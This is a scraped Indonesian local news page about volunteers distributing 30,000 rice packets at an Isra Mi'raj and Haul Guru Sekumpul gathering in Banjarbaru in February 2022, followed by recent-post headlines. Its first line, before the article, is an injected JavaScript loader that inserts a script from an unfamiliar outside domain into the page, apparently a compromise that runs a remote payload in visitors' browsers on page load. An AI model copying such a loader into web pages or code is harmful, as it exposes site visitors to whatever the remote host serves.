(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

30 Ribu Nasi Bungkus Dibagikan untuk Jemaah Isra Mi’raj dan Haul Guru Sekumpul


KANALKALIMANTAN.COM, BANJARBARU – Ratusan relawan gabungan dari beberapa wilayah di Kalimantan Selatan bekerja sama untuk menyukseskan acara peringatan Isra Mi’raj Nabi Muhammad SAW dan Haul Guru Sekumpul di Perumahan Kota Citra Graha (KCG) Banjarbaru, Selasa (8/2/2022).

Pengamanan kegiatan seperti pengaturan parkir kendaraan, pengaturan shaf jemaah, hingga pembagian konsumsi berupa nasi bungkus dilakukan oleh ratusan relawan yang didominasi laki laki tersebut.

Iyan, salah satu relawan dari Banjarmasin Barat mengungkapkan, selain melakukan tugas pembagian nasi bungkus, dirinya bersama relawan lainnya juga ikut turut membungkus 30 ribu nasi dengan berbagai lauk pauk mulai ayam, telur, dan daging sapi.

“Dari malam tadi kami sudah membungkus daging, terus tadi siang 30 ribu nasi kami bungkus,” ungkapnya kepada Kanalkalimantan.com.

 

Baca juga : Peringatan Isra Mi’raj dan Haul Guru Sekumpul di KCG Banjarbaru Dipenuhi Jemaah

Lanjutnya, setiap relawan juga ditekankan untuk terus mengedukasi dan mengimbau masyarakat agar disiplin melaksanakan protokol kesehatan, seperti menegur jemaah yang memakai masker melorot.

“Kami tekankan para Jemaah untuk selalu mematuhi protokol yang turut di jelaskan pada di undangan acara,” lanjutnya.

Tak hanya itu, pengaturan shaf pun turut dilakukan oleh beberapa relawan gabungan, dalam rangka mengatur jarak agar tidak terlalu berdekatan.

“Kami selaku volunteer dari Banjarmasin bertugas untuk mengarahkan dan mengatur shaf para Jemaah, karena mengingat dua kali sholat berjama’ah dilakukan yaitu Magrib dan Isya,” ujar Zakir, salah satu anggota relawan dari Banjarmasin.

 

Baca juga : Polres Banjarbaru dan Relawan Gabungan Amankan Isra Mi’raj dan Haul Guru Sekumpul di KCG

Sampai sehabis Magrib, ribuan jemaah terus berdatangan ke halaman Masjid Harun Aliah Perumahan KCG yang juga berdekatan dengan rumah H Norhin pemilik Perumahan KCG Banjarbaru.

Dilaporkan Hasan Basri, Kanit Lantas Polsek Liang Anggang, Jemaah yang datang tidak hanya dari Banjarmasin, Banjarbaru, dan Martapura saja tetapi Jemaah dari Tanah Bumbu hingga yang mendominasi adalah Jemaah dari Anjir Muara Kabupaten Barito Kuala, yang datang dengan menggunakan motor maupun mobil pribadi.(KanalKalimantan.com/Wanda)

Reporter : wanda
Editor : cell


Desy Arfianty

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

1 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

2 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

2 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

3 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

5 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

6 jam ago

This website uses cookies.